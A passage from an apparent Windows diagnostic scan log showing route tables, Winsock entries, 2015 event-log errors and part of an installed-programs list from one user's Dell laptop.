     192.168.75.1  255.255.255.255         On-link      192.168.75.1    276
   192.168.75.255  255.255.255.255         On-link      192.168.75.1    276
     192.168.93.0    255.255.255.0         On-link      192.168.93.1    276
     192.168.93.1  255.255.255.255         On-link      192.168.93.1    276
   192.168.93.255  255.255.255.255         On-link      192.168.93.1    276
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link      192.168.75.1    276
        224.0.0.0        240.0.0.0         On-link      192.168.93.1    276
        224.0.0.0        240.0.0.0         On-link       192.168.1.4    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link      192.168.75.1    276
  255.255.255.255  255.255.255.255         On-link      192.168.93.1    276
  255.255.255.255  255.255.255.255         On-link       192.168.1.4    281
===========================================================================
Persistent Routes:
  None
 
IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
 17    276 fe80::/64                On-link
 18    276 fe80::/64                On-link
 14    281 fe80::/64                On-link
 17    276 fe80::e9:ff48:ac8b:d8e1/128
                                    On-link
 14    281 fe80::5dc4:d591:1fbf:3eb0/128
                                    On-link
 18    276 fe80::e0ba:c7ad:6de2:85ae/128
                                    On-link
  1    306 ff00::/8                 On-link
 17    276 ff00::/8                 On-link
 18    276 ff00::/8                 On-link
 14    281 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================
 
Catalog5 01 C:\Windows\SysWOW64\NLAapi.dll [52224] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\napinsp.dll [52224] (Microsoft Corporation)
Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\pnrpnsp.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [20992] (Microsoft Corporation)
Catalog5 07 C:\Windows\SysWOW64\wshbth.dll [36352] (Microsoft Corporation)
Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280] (Microsoft Corp.)
Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280] (Microsoft Corp.)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
Catalog9 11 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\NLAapi.dll [70656] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\pnrpnsp.dll [86016] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [28672] (Microsoft Corporation)
x64-Catalog5 07 C:\Windows\System32\wshbth.dll [47104] (Microsoft Corporation)
x64-Catalog5 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [170880] (Microsoft Corp.)
x64-Catalog5 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [170880] (Microsoft Corp.)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [327168] (Microsoft Corporation)
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (06/05/2015 11:26:15 PM) (Source: Application Hang) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.17801 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 15a0
 
Start Time: 01d0a005563bad8a
 
Termination Time: 13
 
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Report Id:
 
Error: (06/05/2015 10:06:29 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 09:58:57 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 09:57:34 PM) (Source: CVHSVC) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
Error: (06/05/2015 09:54:49 PM) (Source: Application Error) (User: )
Description: Faulting application name: srvc.exe, version: 1.0.0.1, time stamp: 0x4fb9ca73
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0xb94
Faulting application start time: 0xsrvc.exe0
Faulting application path: srvc.exe1
Faulting module path: srvc.exe2
Report Id: srvc.exe3
 
Error: (06/05/2015 09:54:28 PM) (Source: HandsFree Client) (User: )
Description: HandsFree Client error:The service has detected an error and stopped.
 
Error: (06/05/2015 04:47:02 PM) (Source: Application Error) (User: )
Description: Faulting application name: AA2Play English.exe, version: 1.0.4.0, time stamp: 0x53b5fe5d
Faulting module name: AA2Play English.exe, version: 1.0.4.0, time stamp: 0x53b5fe5d
Exception code: 0xc0000005
Fault offset: 0x00075f50
Faulting process id: 0x1850
Faulting application start time: 0xAA2Play English.exe0
Faulting application path: AA2Play English.exe1
Faulting module path: AA2Play English.exe2
Report Id: AA2Play English.exe3
 
Error: (06/05/2015 03:10:12 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 03:02:42 PM) (Source: CVHSVC) (User: )
Description: Information only.
(Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 03:02:11 PM) (Source: CVHSVC) (User: )
Description: Information only.
Too many failures while downloading ranges: 2
 
 
System errors:
=============
Error: (06/05/2015 10:23:19 PM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.199.1801.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.8.0204.00
 
Source Path: 4.8.0204.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (06/05/2015 10:22:55 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for FailureCommand with the following error: 
%%5
 
Error: (06/05/2015 10:04:42 PM) (Source: Service Control Manager) (User: )
Description: The ScRegSetValueExW call failed for Start with the following error: 
%%5
 
Error: (06/05/2015 10:03:42 PM) (Source: iaStor) (User: )
Description: The device, \Device\Ide\iaStor0, did not respond within the timeout period.
 
Error: (06/05/2015 10:01:15 PM) (Source: Service Control Manager) (User: )
Description: The Windows Update service hung on starting.
 
Error: (06/05/2015 09:59:49 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (06/05/2015 09:59:19 PM) (Source: Service Control Manager) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
 
Error: (06/05/2015 09:56:24 PM) (Source: WMPNetworkSvc) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
 
Error: (06/05/2015 09:55:39 PM) (Source: Service Control Manager) (User: )
Description: The Trend Micro Client/Server Security Agent service failed to start due to the following error: 
%%1053
 
Error: (06/05/2015 09:55:39 PM) (Source: Service Control Manager) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Trend Micro Client/Server Security Agent service to connect.
 
 
Microsoft Office Sessions:
=========================
Error: (06/05/2015 11:26:15 PM) (Source: Application Hang)(User: )
Description: IEXPLORE.EXE11.0.9600.1780115a001d0a005563bad8a13C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Error: (06/05/2015 10:06:29 PM) (Source: CVHSVC)(User: )
Description: (Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 09:58:57 PM) (Source: CVHSVC)(User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 09:57:34 PM) (Source: CVHSVC)(User: )
Description: Too many failures while downloading ranges: 2
 
Error: (06/05/2015 09:54:49 PM) (Source: Application Error)(User: )
Description: srvc.exe1.0.0.14fb9ca73unknown0.0.0.000000000c000000500000000b9401d09ffbb837c2bcC:\Program Files (x86)\HandsFree\Client\srvc.exeunknown03114b81-0bef-11e5-afce-005056c00008
 
Error: (06/05/2015 09:54:28 PM) (Source: HandsFree Client)(User: )
Description: HandsFree Client error:The service has detected an error and stopped.
 
Error: (06/05/2015 04:47:02 PM) (Source: Application Error)(User: )
Description: AA2Play English.exe1.0.4.053b5fe5dAA2Play English.exe1.0.4.053b5fe5dc000000500075f50185001d09fd0a2186e03C:\illusion\ArtificialAcademy2\AA2Play English.exeC:\illusion\ArtificialAcademy2\AA2Play English.exe04474518-0bc4-11e5-9e96-005056c00008
 
Error: (06/05/2015 03:10:12 PM) (Source: CVHSVC)(User: )
Description: (Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: A connection with the server could not be established
 
Error: (06/05/2015 03:02:42 PM) (Source: CVHSVC)(User: )
Description: (Stream product id=0x0066): Streaming Failed
 
Error: (06/05/2015 03:02:11 PM) (Source: CVHSVC)(User: )
Description: Too many failures while downloading ranges: 2
 
 
=========================== Installed Programs ============================
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
AccelerometerP11 (HKLM-x32\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.8.638 - Adobe Systems, Inc.)
Age of Empires II: HD Edition (HKLM-x32\...\Steam App 221380) (Version:  - Hidden Path Entertainment, Ensemble Studios)
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec Fingerprint Software (HKLM\...\{560DCF39-61D1-43B0-86DA-5EFF8F7A5144}) (Version: 8.4.4.20 - AuthenTec, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BioAPI Framework (HKLM\...\{9DAED4FC-2B0E-4F3F-8141-F2ABF02CCFCB}) (Version: 1.0.2 - Dell Inc.) Hidden
Broadcom NetXtreme-I Netlink Driver and Management Installer (HKLM\...\{64973F6A-8754-43D1-BDD0-FC6F0546347B}) (Version: 14.4.6.2 - Broadcom Corporation)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Custom (HKLM\...\{7206B668-FEE0-455B-BB1F-9B5A2E0EC94A}) (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
CyberLink PowerDVD 9.5 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.5.1.3225 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 01.01.01.001 - Wave Systems Corp) Hidden
Dell Data Protection | Access (HKLM-x32\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.001 - Dell Inc.)
Dell Data Protection | Access | Drivers (HKLM-x32\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.)
Dell Data Protection | Access | Middleware (HKLM-x32\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell System Manager (HKLM\...\{FDF509ED-9624-4FDE-9BAA-9566C186AB96}) (Version: 1.6.00000 - Dell Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.28 - Creative Technology Ltd)
DellAccess (HKLM\...\{F839C6BD-E92E-48FA-9CE6-7BFAF94F7096}) (Version: 01.01.00.053 - Wave Systems Corp.) Hidden
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DirectX 9 Runtime (HKLM-x32\...\{AF9E97C1-7431-426D-A8D5-ABE40995C0B1}) (Version: 1.00.0000 - Sonic Solutions) Hidden
EMBASSY Security Center (HKLM\...\{EEAFE1E5-076B-430A-96D9-B567792AFA88}) (Version: 04.03.00.067 - Wave Systems Corp.) Hidden
EPSON Printer Software (HKLM\...\EPSON Printer and Utilities) (Version:  - )
FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.39 - FileZilla Project)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Gemalto (HKLM\...\{91CE5F03-3A2A-4268-935A-04944F058AE9}) (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.81 - Google Inc.)
Google Drive (HKLM-x32\...\{35574F09-89F9-4B16-B69B-64F3E25901B8}) (Version: 1.21.9226.6034 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{3F15E203-BC3E-3597-84CD-EDF99546C917}) (Version: 3.2.4.8431 - Google)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.27.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 5.4.0.1082 (HKCU\...\GoToMeeting) (Version: 5.4.0.1082 - CitrixOnline)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HF pAppLoc version 1.1 (HKLM-x32\...\{9143B17E-BBDE-4EA7-A4E3-20D384D9C8A5}_is1) (Version: 1.1 - Inquisitor)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.241 - SurfRight B.V.)
ILLUSION ジンコウガクエン2 (HKLM-x32\...\{AF83EF7D-353A-4E0C-9919-C4E4BCB5F742}) (Version: 1.00.0000 - ILLUSION)
ILLUSION ジンコウガクエン2 きゃらめいく (HKLM-x32\...\{A56F495B-7075-4510-AC91-485416140DA2}) (Version: 1.00.0000 - ILLUSION)
Intel® Identity Protection Technology 1.0.71.0 (HKLM-x32\...\{2C43790E-8470-1027-82D3-DF319F3C410F}) (Version: 1.0.71.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4101 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{4C1CCA11-0D08-4D5E-8444-2D9FB48BCABF}) (Version: 14.00.20110 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (HKLM-x32\...\{730E03E4-350E-48E5-9D3E-4329903D454D}) (Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
join.me (HKCU\...\JoinMe) (Version: 1.7.0.138 - LogMeIn, Inc.)
Juniper Networks Network Connect 7.4.0 (HKLM-x32\...\Juniper Network Connect 7.4.0) (Version: 7.4.0.27757 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.4.6.40675 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Medieval II: Total War (HKLM-x32\...\Steam App 4700) (Version:  - The Creative Assembly)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SkyDrive (HKCU\...\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{AB4AE7E5-E63E-458E-A9D9-B271EA2ED69B}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service  (HKLM\...\{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Modem Diagnostic Tool (HKLM\...\{0335701D-8E28-4A7F-B0EF-312974755BB2}) (Version: 1.0.28.0 - Dell)
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mozilla Thunderbird 17.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 17.0 (x86 en-US)) (Version: 17.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netwaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.59 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 21.7.0.11 - Symantec Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.9.3 - )
